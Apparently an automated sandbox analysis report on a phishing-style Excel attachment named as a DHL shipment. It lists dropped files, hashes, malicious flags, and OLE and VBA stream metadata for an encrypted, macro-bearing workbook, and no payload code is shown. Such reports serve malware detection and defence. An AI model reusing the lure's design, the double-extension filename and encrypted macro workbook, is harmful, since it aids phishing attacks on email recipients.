                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20971520
                                Entropy (8bit):8.112143835430977E-5
                                Encrypted:false
                                SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                MD5:AFDEAC461EEC32D754D8E6017E845D21
                                SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20971520
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):71
                                Entropy (8bit):4.3462513114457515
                                Encrypted:false
                                SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                Malicious:false
                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:ASCII text, with very long lines (28653), with CRLF line terminators
                                Category:dropped
                                Size (bytes):20971520
                                Entropy (8bit):0.2025258909554802
                                Encrypted:false
                                SSDEEP:1536:Gr8aksbUcNIVYhCvhX/Pxn5wV0t/MtyzDjj+xIgtOAQ+aYEiu8hTwBUxC9Fesk0O:mlN85vPxFt/MTNQbm1NRuTBga1
                                MD5:0C70E40134AD8B836D502C414C1CA5EF
                                SHA1:CFB3CDD59F0CB64C5B40A090030AFDA4B99FF2A9
                                SHA-256:B92AFD6755765687EB4291F7A2B580001DB6A047BED8E1C51547C336D81B5349
                                SHA-512:1F1B42DEDAF795056BF62CBDCD3FE4400F9C5EEB5E715B4300FEE88AC959B6B91AA19EC4E1EB78B20BC44FE91EE18BB9F40D3EE127E43F2200E58733D68CC531
                                Malicious:false
                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/15/2025 07:50:05.431.EXCEL (0x1EE0).0x1F98.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-15T07:50:05.431Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T07:50:04.9630052Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T07:50:04.9630052Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T07:50:04.9630052Z\", \"C\" : \"\", \"Q\" : 5.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20971520
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:ASCII text, with very long lines (28772), with CRLF line terminators
                                Category:dropped
                                Size (bytes):231599
                                Entropy (8bit):5.17059333154726
                                Encrypted:false
                                SSDEEP:1536:2OkY/LRyJLOlTVuY/GnyxV5nDBsU7RYptHPEXRtylkDNFTHTpin7/1bwkq5v1jj/:EJL2UY/GkHuTBgaWTpF
                                MD5:5E241244D9DD1FEA799AB2B6CB01FD32
                                SHA1:9394962BFA287A5643E45E607DDC6DB62FE191F2
                                SHA-256:057CE0A050BB013A410F9B962429EEA9F1BF92FE923D59A19B1DD398A5276168
                                SHA-512:ED259DF1F9A61CD00F467D9F9C4DE3577D5443C5C5486138BB633A6C1810B034390BD58B06F1C2EB9F6122C8685BB159E6C3AE10E1DC70EDF7379D1E432D1D5E
                                Malicious:false
                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/15/2025 07:51:20.015.EXCEL (0xE48).0x1A44.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2025-03-15T07:51:20.015Z","Contract":"Office.System.Activity","Activity.CV":"V3Kj8lrEskuBH1foREijSw.1.12","Activity.Duration":14,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...03/15/2025 07:51:20.047.EXCEL (0xE48).0x1A44.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2025-03-15T07:51:20.047Z","Contract":"Office.System.Activity","Activity.CV":"V3Kj8lrEskuBH1foREijSw.1.13","Activity.Duration":22408,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion":4
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):172032
                                Entropy (8bit):6.829261530188966
                                Encrypted:false
                                SSDEEP:3072:p0N1A24C19qs9NSG61N6NyqzVj6Kr5OkGkIss7:L6OsrSnKyqzVFr0kOss7
                                MD5:F956F9EEDBD5771195CC0150A3C394C3
                                SHA1:B40E82D5C5470F353E2EB8CA16CCC3B03F6083D7
                                SHA-256:74E28C50CA6C4026763C7ECDFEE26C6E9D68C0101A44825F36C34591618B41F5
                                SHA-512:F1D809EBCC634EBC23A9AC82D945569FB217CC47545930B940435E61A4BD370019A5308C3B31D784A60B8007E5102AF1FC83BC4070F9A54EFCAA2FDED46BCA50
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                Malicious:false
                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Mar 15 07:51:18 2025, Security: 1
                                Category:dropped
                                Size (bytes):1069568
                                Entropy (8bit):7.856467077326439
                                Encrypted:false
                                SSDEEP:24576:EUVKDHtWjejsk4McuKJIwgxIOXR8YhbBWvdp8tLUWBMDc:VCaejH4MTKzguM8YkpwLUwh
                                MD5:20EFC2B8411FB76AE6347F3E8367E662
                                SHA1:6E372FB44E1F6A0697061E97E63D594D7879E223
                                SHA-256:B0E0BADA66168012C6C14C350CB9EE8F7238E57EC6BDC78346E82C29BD052D95
                                SHA-512:EFA7143E7C159738F76498CC9A230BB89F0D154CEC32296F6F210D588B543A09AF72E35A952A1BDF03675F9E04F7F6865E24F911434E89956B6ABD85C77171FC
                                Malicious:false
                                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Mar 15 07:51:18 2025, Security: 1
                                Category:dropped
                                Size (bytes):1069568
                                Entropy (8bit):7.856467077326439
                                Encrypted:false
                                SSDEEP:24576:EUVKDHtWjejsk4McuKJIwgxIOXR8YhbBWvdp8tLUWBMDc:VCaejH4MTKzguM8YkpwLUwh
                                MD5:20EFC2B8411FB76AE6347F3E8367E662
                                SHA1:6E372FB44E1F6A0697061E97E63D594D7879E223
                                SHA-256:B0E0BADA66168012C6C14C350CB9EE8F7238E57EC6BDC78346E82C29BD052D95
                                SHA-512:EFA7143E7C159738F76498CC9A230BB89F0D154CEC32296F6F210D588B543A09AF72E35A952A1BDF03675F9E04F7F6865E24F911434E89956B6ABD85C77171FC
                                Malicious:false
                                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:E4FFN/EDPWlFlfv:1FWilffv
                                MD5:47A294922BE037C38D73C866A3F7F5E0
                                SHA1:E165F663BF052660CF1858D065388CC128E631D2
                                SHA-256:34033A21A8D54B0627C089E5C6A6C3AD6CE045DF86ACDED6A31D9613B879C265
                                SHA-512:F46ABEEF0E3ED4B80B2C996E44E6E103FE22D12F5BF461708AE401C1C5F8CAC3718068C2D7FF0A1995A0866E473AB1DF6A20A4BD12211B9BAA99EB4535CFE83A
                                Malicious:true
                                Preview:.user ..G.a.n.j.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Mar 14 03:54:01 2025, Security: 1
                                Entropy (8bit):7.8312397036284
                                TrID:
                                • Microsoft Excel sheet (30009/1) 47.99%
                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                File name:DHL 733988905ZHH.xla.xlsx
                                File size:1'172'992 bytes
                                MD5:221f228dfa20495a79346d343e9247dc
                                SHA1:9cb6b9b2789a5a227c6561790ea353507713f98c
                                SHA256:279212a280629727edeb1bab801d30116de12ed162400753638a7ec51523aa1b
                                SHA512:e3ca05ec2d263a621000a2c45936805330a7a89766a2f440c28df68822c873fa2a0163446d8474720ec2498c5cde600924188017383290d34d592e8cec10d684
                                SSDEEP:24576:rLA6DHtWjejsk4McuyJIwgxIOXR8YhbBWvdp8tLUWBMDcfI4AQ:gSaejH4MTyzguM8YkpwLUwh1AQ
                                TLSH:0E450294BFC09626DA1D02350FE38B1C5915EEEB5755620F3236BE2D3EB6A3E0B72105
                                File Content Preview:........................>......................................................................................................................................................................................................................................
                                Icon Hash:35e58a8c0c8a85b9
                                Document Type:OLE
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:Microsoft Excel
                                Encrypted Document:True
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:True
                                Code Page:1252
                                Author:
                                Last Saved By:
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2025-03-14 03:54:01
                                Creating Application:Microsoft Excel
                                Security:1
                                Document Code Page:1252
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:786432
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                VBA File Name:Sheet1.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d c3 af 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet1"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                VBA File Name:Sheet2.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d d9 25 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet2"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                VBA File Name:Sheet3.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d f8 cc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet3"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                VBA File Name:ThisWorkbook.cls
                                Stream Size:985
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 af 3d 14 ed 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "ThisWorkbook"
                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.25248375192737
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:244
                                Entropy:2.889430592781307
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                General
                                Stream Path:\x5SummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:200
                                Entropy:3.2920681057018664
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                General
                                Stream Path:MBD0077BD89/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.25248375192737
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD0077BD89/\x5DocumentSummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:296
                                Entropy:3.2973193143624515
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                                General
                                Stream Path:MBD0077BD89/\x5SummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:31156
                                Entropy:3.1876994904322484
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                                General
                                Stream Path:MBD0077BD89/MBD00320C7F/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.219515110876372
                                Base64 Encoded:False
                                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
